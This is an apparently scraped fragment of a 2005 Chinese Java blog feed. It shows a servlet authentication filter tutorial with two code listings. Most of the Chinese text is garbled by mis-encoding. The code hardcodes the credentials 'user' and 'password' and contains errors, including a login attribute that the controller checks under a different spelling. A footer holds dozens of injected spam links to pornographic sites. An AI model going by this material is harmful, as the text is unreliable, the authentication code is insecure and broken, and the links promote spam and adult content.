     ListEmpAction empaction = new ListEmpAction();
     System.out.print("End"); 
   }
  
}



my java 2005-09-27 13:21 鍙戣〃璇勮
]]>
AuthenticationFilter榪囨護(hù)鍣?/title><link>http://m.tkk7.com/lmsun/archive/2005/09/12/12764.html</link><dc:creator>my java</dc:creator><author>my java</author><pubDate>Mon, 12 Sep 2005 08:27:00 GMT</pubDate><guid>http://m.tkk7.com/lmsun/archive/2005/09/12/12764.html</guid><wfw:comment>http://m.tkk7.com/lmsun/comments/12764.html</wfw:comment><comments>http://m.tkk7.com/lmsun/archive/2005/09/12/12764.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://m.tkk7.com/lmsun/comments/commentRss/12764.html</wfw:commentRss><trackback:ping>http://m.tkk7.com/lmsun/services/trackbacks/12764.html</trackback:ping><description><![CDATA[<STRONG>閲嶅畾鍚戣姹?<BR><BR></STRONG>銆銆涓嬮潰鎴戜滑鏉ユ瀯閫犱竴涓狝uthenticationFilter榪囨護(hù)鍣紝瀹冪殑鍔熻兘鏄埅鑾峰Controller Servlet鐨勮姹傦紝鐒跺悗楠岃瘉鐢ㄦ埛鐨勮韓浠姐傛寜鐓у墠闈粙緇嶇殑姝ラ鐢ㄥ悜瀵煎垱寤鴻繃婊ゅ櫒鏃訛紝鍚戝鎻愪緵浜?jiǎn)瀹氫箟鍒濆鍖栧弬鏁般佽繃婊ゅ櫒鐨刄RL鍜孲ervlet鏄犲皠絳夊弬鏁般傚鏋滀笉璁劇疆榪欑被鍙傛暟錛岀己鐪佹儏鍐典笅鍚戝鐢ㄨ繃婊ゅ櫒鏈韓鐨勫悕縐板垱寤轟竴涓猆RL鏄犲皠錛屾垜浠皢鍦ㄤ笅闈㈢敤緙栬緫web.xml鏂囦歡鐨勬柟寮忓畾涔夋槧灝勶紝鍥犳鐜板湪鍏堣鍙己鐪佸箋傛敞鎰忥紝濡傛灉浣犳兂鍦ㄩ摼涓嬌鐢ㄤ竴涓互涓婄殑榪囨護(hù)鍣紝閭e氨蹇呴』鎵嬪伐緙栬緫web.xml銆?<BR><BR>銆銆鍦ㄥ悜瀵間腑鐐瑰嚮鈥滃畬鎴愨濇寜閽悗錛學(xué)SAD绔嬪嵆鏋勯犲嚭榪囨護(hù)鍣ㄧ殑楠ㄦ灦浠g爜銆傚浜庢湰渚嬫潵璇達(dá)紝鎺ヤ笅鏉ユ垜浠敮涓鐨勪換鍔″氨鏄皢浠g爜鎻掑叆doFilter()鏂規(guī)硶錛屽Listing 1鎵紺恒?<BR><BR><CCID_NOBR> <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=540 align=center borderColorLight=black border=1> <TBODY> <TR> <TD class=code bgColor=#e6e6e6><PRE><CCID_CODE>// Listing 1: AuthenticationFilter.java public void doFilter( ServletRequest req, ServletResponse resp, FilterChain chain) throws ServletException, IOException { String nextPage; RequestDispatcher rd = null; //媯(gè)鏌ョ敤鎴峰悕縐板拰瀵嗙爜 if (req.getParameter("userid") != null) { if (!((req.getParameter("password").equals("password")) && (req.getParameter("userid").equals("user")))) { ArrayList actionreport = newArrayList(); actionreport.add("鐧誨綍澶辮觸銆傘傘?); (((HttpServletRequest) req).getSession()).setAttribute( "actionreport", actionreport); nextPage = "failure.jsp"; System.out.println("鑾峰緱浜?jiǎn)鏉ヨ嚜杩囨护鍣ㄧ殑搴斀{斻?); // 灝嗚姹傜洿鎺ヤ紶閫掔粰涓嬩竴涓〉闈紙鑰屼笉鏄疌ontroller Servlet錛? rd = req.getRequestDispatcher(nextPage); rd.forward(req, resp); } else { req.setAttribute("login", "loginsuccess"); // 灝嗚姹備紶閫掔粰C(jī)ontroller Servlet chain.doFilter(req, resp); System.out.println("鑾峰緱浜?jiǎn)鏉ヨ嚜杩囨护鍣ㄧ殑搴斀{斻?); } } else { rd = req.getRequestDispatcher("Welcome.jsp"); rd.forward(req, resp); } }</CCID_CODE></PRE></TD></TR></TBODY></TABLE></CCID_NOBR><BR><BR>銆銆浠庝笂闈㈢殑浠g爜鍙互鐪嬪嚭錛屽湪榪囨護(hù)鍣ㄤ腑楠岃瘉鐢ㄦ埛韜喚鐨勬柟寮忎粛鍜屽鉤甯哥殑涓鏍楓傚湪姝よ繃紼嬩腑錛屼負(fù)浜?jiǎn)鑾峰緱session瀵硅薄錛屾垜浠妸ServletRequest瀹氬瀷錛坈ast錛夋垚浜?jiǎn)HttpServletRequest銆傚鏋滅敤鎴鋒湭鑳介氳繃韜喚楠岃瘉錛屾垜浠笉鍐嶆妸璇鋒眰浼犻掔粰C(jī)ontroller Servlet錛岃屾槸閫氳繃RequestDispatcher鎶婅姹備紶閫掔粰鎶ュ憡欏甸潰錛坒ailure.jsp錛夈?<BR><BR>銆銆濡傛灉鐢ㄦ埛閫氳繃浜?jiǎn)桧n浠介獙璇侊紝鍒欐垜浠皟鐢╟hain.doFilter()錛屽厑璁稿簲絳旇繘鍏ontroller鈥斺旇繖鏄洜涓鴻皟鐢╟hain.doFilter()鏃訛紝閾鵑噷闈㈠凡緇忔病鏈夊叾浠栬繃婊ゅ櫒錛屾墍浠ユ帶鍒跺皢浠OST鏂瑰紡杞叆浣滀負(fù)Controller鐨凷ervlet錛屽疄闄呬笂錛宑hain.doFilter()灝嗚皟鐢–ontroller.doPost()鏂規(guī)硶銆?<BR><BR>銆銆鍙戦佽姹傜粰C(jī)ontroller涔嬪墠錛屾垜浠彲浠ユ牴鎹敤鎴瘋幏寰楃殑韜喚璇佷功鏉ヨ緗姹傜殑灞炴э紝榪欎簺淇℃伅灝嗗府鍔〤ontroller鍙?qiáng)鍏惰緟鍔┚c誨鐞嗚姹傘備綔涓轟竴涓緥瀛愶紝鎴戜滑璁劇疆浜?jiǎn)璇锋眰鐨刲ogin灞炴э紝鐒跺悗鍦–ontroller涓鏌ヨ灞炴э紝Controller鎶婂簲絳旇繑鍥炵粰success.jsp錛堝Listing 2鎵紺猴級(jí)銆?<BR><BR><CCID_NOBR> <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=540 align=center borderColorLight=black border=1> <TBODY> <TR> <TD class=code bgColor=#e6e6e6><PRE><CCID_CODE>// Listing 2: controller.java protected final void doPost( HttpServletRequest request, HttpServletResponse response) { // begining codes //--鐢ㄦ埛宸查氳繃韜喚楠岃瘉 if (((String) request.getAttribute("login")).equals ("login success")) { ArrayList actionreport = new ArrayList(); actionreport.add("Correct Password"); session.setAttribute("actionreport", actionreport); nextPage = "success.jsp"; } if (dispatch) { RequestDispatcher rd = getServletContext().getRequestDispatcher(nextPage); rd.forward(request, response); } else { session.invalidate(); } // ending codes }</PRE></TD></TR></TBODY></TABLE><img src ="http://m.tkk7.com/lmsun/aggbug/12764.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.tkk7.com/lmsun/" target="_blank">my java</a> 2005-09-12 16:27 <a href="http://m.tkk7.com/lmsun/archive/2005/09/12/12764.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item></channel></rss> <footer> <div class="friendship-link"> <p>感谢您访问我们的网站,您可能还对以下资源感兴趣:</p> <a href="http://m.tkk7.com/" title="亚洲av成人片在线观看">亚洲av成人片在线观看</a> <div class="friend-links"> </div> </div> </footer> 主站蜘蛛池模板: <a href="http://yy468.com" target="_blank">亚洲精品久久无码av片俺去也 </a>| <a href="http://xjyzz.com" target="_blank">一区二区三区免费视频网站</a>| <a href="http://tpwelert.com" target="_blank">一个人在线观看视频免费</a>| <a href="http://www998xe.com" target="_blank">亚洲午夜未满十八勿入</a>| <a href="http://89kino.com" target="_blank">91短视频在线免费观看</a>| <a href="http://ccc998.com" target="_blank">亚洲视频手机在线</a>| <a href="http://mangaou.com" target="_blank">国产免费丝袜调教视频</a>| <a href="http://kk600700.com" target="_blank">亚洲一区动漫卡通在线播放</a>| <a href="http://38miao.com" target="_blank">中文字幕无码视频手机免费看</a>| <a href="http://yy7699.com" target="_blank">精品亚洲成A人无码成A在线观看</a>| <a href="http://yuanzhouxh.com" target="_blank">在线观看免费人成视频色9</a>| <a href="http://gzmkqp.com" target="_blank">亚洲熟妇AV一区二区三区宅男</a>| <a href="http://tccqdy.com" target="_blank">午夜免费福利在线观看</a>| <a href="http://jhmydxx.com" target="_blank">亚洲AV网一区二区三区 </a>| <a href="http://359777b.com" target="_blank">亚洲伊人色一综合网</a>| <a href="http://daohang123456.com" target="_blank">日本片免费观看一区二区</a>| <a href="http://dfcnpc.com" target="_blank">亚洲日产2021三区在线</a>| <a href="http://6006769.com" target="_blank">日韩一区二区免费视频</a>| <a href="http://359777b.com" target="_blank">无码精品人妻一区二区三区免费</a>| <a href="http://beidemei.com" target="_blank">国产亚洲精品精品国产亚洲综合</a>| <a href="http://9988u.com" target="_blank">久久国产精品国产自线拍免费</a>| <a href="http://codecampo.com" target="_blank">亚洲第一页在线观看</a>| <a href="http://yuezhaoming.com" target="_blank">女人被男人躁的女爽免费视频</a>| <a href="http://k96d.com" target="_blank">WWW国产亚洲精品久久麻豆</a>| <a href="http://zzz134.com" target="_blank">最新国产AV无码专区亚洲</a>| <a href="http://haohaoshuo.com" target="_blank">久久这里只精品99re免费</a>| <a href="http://zhaoav7.com" target="_blank">亚洲伊人久久大香线蕉啊</a>| <a href="http://www779rr.com" target="_blank">国产真人无遮挡作爱免费视频 </a>| <a href="http://h588888.com" target="_blank">亚洲区精品久久一区二区三区</a>| <a href="http://cin17.com" target="_blank">在线观看免费宅男视频</a>| <a href="http://liexion.com" target="_blank">一级毛片免费播放试看60分钟 </a>| <a href="http://www24ckck.com" target="_blank">亚洲成年人电影在线观看</a>| <a href="http://xyzch.com" target="_blank">免费看片免费播放</a>| <a href="http://kt4444.com" target="_blank">久久av免费天堂小草播放</a>| <a href="http://avxyz.com" target="_blank">亚洲欧洲日韩综合</a>| <a href="http://516kd.com" target="_blank">www.亚洲精品</a>| <a href="http://35469642.com" target="_blank">国产91色综合久久免费分享</a>| <a href="http://yulongfilm.com" target="_blank">久久精品国产亚洲av瑜伽</a>| <a href="http://doubaye.com" target="_blank">亚洲人成网站在线播放影院在线</a>| <a href="http://haohaoshuo.com" target="_blank">午夜视频免费成人</a>| <a href="http://www5xsq.com" target="_blank">久久国产精品免费专区</a>| <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </body>